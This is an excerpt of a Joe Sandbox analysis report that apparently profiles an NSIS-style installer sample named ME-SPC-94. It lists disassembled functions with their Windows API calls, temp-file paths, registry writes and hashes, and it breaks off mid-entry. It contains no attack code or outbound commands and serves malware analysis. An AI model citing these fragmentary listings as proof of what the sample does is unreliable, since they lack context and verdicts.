                                                  • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                  • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                  • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                  • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                  • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,?,?,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileMultiWideWritelstrlen
                                                  • String ID: 8$C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp$C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll
                                                  • API String ID: 1453599865-1177592820
                                                  • Opcode ID: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                  • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                  • Opcode Fuzzy Hash: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                  • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                  • GetSysColor.USER32(00000000), ref: 0040423A
                                                  • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                  • SetBkMode.GDI32(?,?), ref: 00404252
                                                  • GetSysColor.USER32(?), ref: 00404265
                                                  • SetBkColor.GDI32(?,?), ref: 00404275
                                                  • DeleteObject.GDI32(?), ref: 0040428F
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                  • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                  • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                  • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                  • String ID:
                                                  • API String ID: 3294113728-0
                                                  • Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                  • Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
                                                  • Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                  • Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                  • GetTickCount.KERNEL32 ref: 00402D53
                                                  • wsprintfW.USER32 ref: 00402D81
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                    • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                    • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll), ref: 0040525F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                    • Part of subcall function 00402CFE: MulDiv.KERNEL32(0001E790,00000064,00020B36), ref: 00402D13
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                  • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                  • Opcode Fuzzy Hash: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                  • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                  • GetMessagePos.USER32 ref: 00404ADF
                                                  • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                  • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                  • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                  • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D44
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                  • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID: Times New Roman
                                                  • API String ID: 3808545654-927190056
                                                  • Opcode ID: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                  • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                  • Opcode Fuzzy Hash: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                  • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                  APIs
                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9D
                                                  • wsprintfW.USER32 ref: 00402CD1
                                                  • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                  • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                  • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                  • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                  APIs
                                                    • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                  • GlobalFree.KERNEL32(?), ref: 10002572
                                                  • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                  • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                  • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                  • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                  APIs
                                                  • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                  • wsprintfW.USER32 ref: 00404A70
                                                  • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$&B
                                                  • API String ID: 3540041739-2907463167
                                                  • Opcode ID: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                  • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                  • Opcode Fuzzy Hash: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                  • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                  APIs
                                                  • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                  • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateValuelstrlen
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp
                                                  • API String ID: 1356686001-3085278003
                                                  • Opcode ID: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                  • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                  • Opcode Fuzzy Hash: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                  • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FreeGlobal
                                                  • String ID:
                                                  • API String ID: 2979337801-0
                                                  • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                  • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                  • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                  • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                  • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                  • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                  • String ID:
                                                  • API String ID: 1148316912-0
                                                  • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                  • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                  • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                  • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                  • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                  • DeleteObject.GDI32(00000000), ref: 00401D36
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
